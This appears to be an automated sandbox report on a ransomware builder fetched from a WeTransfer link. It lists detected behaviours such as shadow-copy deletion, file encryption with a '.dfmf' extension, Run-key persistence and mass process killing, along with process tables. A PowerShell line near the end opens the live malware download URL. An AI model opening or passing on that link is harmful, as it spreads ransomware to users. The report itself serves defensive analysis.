hxxp://we[.]tl/t-ZRlwhHea1p

max time kernel
380s
max time network
325s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19/10/2022, 05:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://we.tl/t-ZRlwhHea1p

Score

9^/10

evasion persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	test.exe
File created	C:\Windows\System32\drivers\etc\hosts	test.exe

Executes dropped EXE 13 IoCs

pid	Process
5984	slam ransomware builder installer.exe
5632	start.exe
3244	slam.exe
728	MSBuild.exe
5784	MSBuild.exe
4448	test.exe
2032	test1.exe
1964	test1.exe
4824	test1.exe
4000	test1.exe
1628	MSBuild.exe
5288	test.exe
3440	test1.exe

Modifies Windows Firewall 1 TTPs 25 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1160	netsh.exe
3692	netsh.exe
520	netsh.exe
4968	netsh.exe
4168	netsh.exe
1752	netsh.exe
1756	netsh.exe
5488	netsh.exe
4872	netsh.exe
1884	netsh.exe
4216	netsh.exe
5132	netsh.exe
2788	netsh.exe
2040	netsh.exe
5924	netsh.exe
4540	netsh.exe
5724	netsh.exe
4036	netsh.exe
4588	netsh.exe
4792	netsh.exe
588	netsh.exe
4424	netsh.exe
4704	netsh.exe
5064	netsh.exe
3360	netsh.exe

Modifies extensions of user files 18 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\CopyPush.tif.dfmf	test.exe
File created	C:\Users\Admin\Pictures\UndoSelect.tiff	test1.exe
File created	C:\Users\Admin\Pictures\CopyPush.tif.dfmf	test.exe
File created	C:\Users\Admin\Pictures\ReadSave.crw.dfmf	test.exe
File created	C:\Users\Admin\Pictures\UndoSelect.tiff.dfmf	test.exe
File created	C:\Users\Admin\Pictures\SwitchConvertTo.tiff	test1.exe
File created	C:\Users\Admin\Pictures\UndoSelect.tiff	test1.exe
File created	C:\Users\Admin\Pictures\ResumeRead.tiff.dfmf	test.exe
File created	C:\Users\Admin\Pictures\ResumeRead.tiff	test1.exe
File created	C:\Users\Admin\Pictures\DenySet.tif.dfmf	test.exe
File created	C:\Users\Admin\Pictures\ResumeRead.tiff.dfmf	test.exe
File created	C:\Users\Admin\Pictures\SwitchConvertTo.tiff.dfmf	test.exe
File created	C:\Users\Admin\Pictures\DenySet.tif.dfmf	test.exe
File created	C:\Users\Admin\Pictures\SwitchConvertTo.tiff.dfmf	test.exe
File created	C:\Users\Admin\Pictures\UndoSelect.tiff.dfmf	test.exe
File created	C:\Users\Admin\Pictures\SwitchConvertTo.tiff	test1.exe
File created	C:\Users\Admin\Pictures\ReadSave.crw.dfmf	test.exe
File created	C:\Users\Admin\Pictures\ResumeRead.tiff	test1.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	slam ransomware builder installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	slam.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	test.exe

Loads dropped DLL 10 IoCs

pid	Process
3244	slam.exe
3244	slam.exe
3244	slam.exe
3244	slam.exe
728	MSBuild.exe
728	MSBuild.exe
5784	MSBuild.exe
5784	MSBuild.exe
1628	MSBuild.exe
1628	MSBuild.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe"	test.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe"	test.exe

Drops desktop.ini file(s) 20 IoCs

description	ioc	Process
File created	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	test1.exe
File created	C:\Users\Admin\Documents\desktop.ini	test1.exe
File created	C:\Users\Admin\Downloads\desktop.ini	test1.exe
File created	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	test1.exe
File created	C:\Users\Admin\3D Objects\desktop.ini	test1.exe
File created	C:\Users\Admin\OneDrive\desktop.ini	test1.exe
File created	C:\Users\Admin\Desktop\desktop.ini	test1.exe
File created	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	test1.exe
File created	C:\Users\Admin\OneDrive\desktop.ini	test1.exe
File created	C:\Users\Admin\Music\desktop.ini	test1.exe
File created	C:\Users\Admin\Videos\desktop.ini	test1.exe
File created	C:\Users\Admin\Downloads\desktop.ini	test1.exe
File created	C:\Users\Admin\Music\desktop.ini	test1.exe
File created	C:\Users\Admin\Documents\desktop.ini	test1.exe
File created	C:\Users\Admin\3D Objects\desktop.ini	test1.exe
File created	C:\Users\Admin\Desktop\desktop.ini	test1.exe
File created	C:\Users\Admin\Pictures\desktop.ini	test1.exe
File created	C:\Users\Admin\Pictures\desktop.ini	test1.exe
File created	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	test1.exe
File created	C:\Users\Admin\Videos\desktop.ini	test1.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\8fe4eeb7-4887-4f39-b2a0-c1ff220abbe6.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221019071035.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
5836	taskkill.exe
4428	taskkill.exe
4388	taskkill.exe
2608	taskkill.exe
4044	taskkill.exe
5156	taskkill.exe
2592	taskkill.exe
4516	taskkill.exe
3720	taskkill.exe
6088	taskkill.exe
5492	taskkill.exe
220	taskkill.exe
4156	taskkill.exe
2104	taskkill.exe
5856	taskkill.exe
6056	taskkill.exe
4832	taskkill.exe
4512	taskkill.exe
2500	taskkill.exe
5676	taskkill.exe
2920	taskkill.exe
3864	taskkill.exe
5704	taskkill.exe
5848	taskkill.exe
4836	taskkill.exe
2220	taskkill.exe
1896	taskkill.exe
5376	taskkill.exe
3916	taskkill.exe
3972	taskkill.exe
808	taskkill.exe
2184	taskkill.exe
5344	taskkill.exe
5884	taskkill.exe
4828	taskkill.exe
2056	taskkill.exe
5676	taskkill.exe
5844	taskkill.exe
5408	taskkill.exe
3516	taskkill.exe
5064	taskkill.exe
5884	taskkill.exe
6128	taskkill.exe
1428	taskkill.exe
6056	taskkill.exe
4972	taskkill.exe
5544	taskkill.exe
4320	taskkill.exe
4804	taskkill.exe
1400	taskkill.exe
3364	taskkill.exe
5152	taskkill.exe
2948	taskkill.exe
2360	taskkill.exe
2832	taskkill.exe
1048	taskkill.exe
4816	taskkill.exe
5300	taskkill.exe
5376	taskkill.exe
5760	taskkill.exe
4704	taskkill.exe
5172	taskkill.exe
4104	taskkill.exe
4276	taskkill.exe

Modifies registry class 39 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	slam.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "3"	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 78003100000000005355a2391000534c414d5f527e310000600009000400efbe535575395355a2392e000000230700000000050000000000000000000000000000004800510073006c0061006d005f00720061006e0073006f006d0077006100720065005f006200750069006c00640065007200000018000000	slam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	slam.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	slam.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	test.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	slam.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	slam.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	test.exe

Modifies registry key 1 TTPs 10 IoCs

Modify Registry

T1112

pid	Process
428	reg.exe
2948	reg.exe
644	reg.exe
5664	reg.exe
5772	reg.exe
1212	reg.exe
1712	reg.exe
5716	reg.exe
4012	reg.exe
840	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 571657.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
216	NOTEPAD.EXE
4124	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5056	powershell.exe
5056	powershell.exe
224	msedge.exe
224	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
5132	identity_helper.exe
5132	identity_helper.exe
5704	msedge.exe
5704	msedge.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe
5984	slam ransomware builder installer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	5984	slam ransomware builder installer.exe
Token: SeDebugPrivilege	5172	taskkill.exe
Token: SeDebugPrivilege	4448	test.exe
Token: SeDebugPrivilege	5848	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	5952	taskkill.exe
Token: SeDebugPrivilege	5932	taskkill.exe
Token: SeDebugPrivilege	3240	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeDebugPrivilege	6088	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	4512	taskkill.exe
Token: SeDebugPrivilege	5288	taskkill.exe
Token: SeDebugPrivilege	5156	taskkill.exe
Token: SeDebugPrivilege	5544	taskkill.exe
Token: SeDebugPrivilege	692	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	5884	taskkill.exe
Token: SeDebugPrivilege	5536	taskkill.exe
Token: SeDebugPrivilege	5300	taskkill.exe
Token: SeDebugPrivilege	648	taskkill.exe
Token: SeDebugPrivilege	6140	taskkill.exe
Token: SeDebugPrivilege	5376	taskkill.exe
Token: SeDebugPrivilege	5676	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	6056	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	4320	taskkill.exe
Token: SeDebugPrivilege	1428	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	5064	taskkill.exe
Token: SeDebugPrivilege	808	taskkill.exe
Token: SeDebugPrivilege	4804	taskkill.exe
Token: SeDebugPrivilege	5836	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe
Token: SeDebugPrivilege	5760	taskkill.exe
Token: SeDebugPrivilege	5152	taskkill.exe
Token: SeDebugPrivilege	5492	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5336	WMIC.exe
Token: SeSecurityPrivilege	5336	WMIC.exe
Token: SeTakeOwnershipPrivilege	5336	WMIC.exe
Token: SeLoadDriverPrivilege	5336	WMIC.exe
Token: SeSystemProfilePrivilege	5336	WMIC.exe
Token: SeSystemtimePrivilege	5336	WMIC.exe
Token: SeProfSingleProcessPrivilege	5336	WMIC.exe
Token: SeIncBasePriorityPrivilege	5336	WMIC.exe
Token: SeCreatePagefilePrivilege	5336	WMIC.exe
Token: SeBackupPrivilege	5336	WMIC.exe
Token: SeRestorePrivilege	5336	WMIC.exe
Token: SeShutdownPrivilege	5336	WMIC.exe
Token: SeDebugPrivilege	5336	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5336	WMIC.exe
Token: SeRemoteShutdownPrivilege	5336	WMIC.exe
Token: SeUndockPrivilege	5336	WMIC.exe
Token: SeManageVolumePrivilege	5336	WMIC.exe
Token: 33	5336	WMIC.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
4448	test.exe
5288	test.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
4448	test.exe
5288	test.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3244	slam.exe
3244	slam.exe
3244	slam.exe
3244	slam.exe
3244	slam.exe
3244	slam.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 4768	3672	msedge.exe	85
PID 3672 wrote to memory of 4768	3672	msedge.exe	85
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 204	3672	msedge.exe	88
PID 3672 wrote to memory of 224	3672	msedge.exe	89
PID 3672 wrote to memory of 224	3672	msedge.exe	89
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90
PID 3672 wrote to memory of 4100	3672	msedge.exe	90

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge http://we.tl/t-ZRlwhHea1p
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch http://we.tl/t-ZRlwhHea1p
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
